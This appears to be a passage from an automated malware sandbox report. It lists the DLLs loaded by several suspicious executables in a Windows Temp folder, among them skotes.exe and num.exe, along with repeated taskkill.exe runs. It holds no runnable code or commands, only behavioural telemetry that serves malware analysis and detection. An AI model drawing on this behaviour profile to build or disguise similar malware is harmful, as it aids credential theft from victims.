Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: iertutil.dll
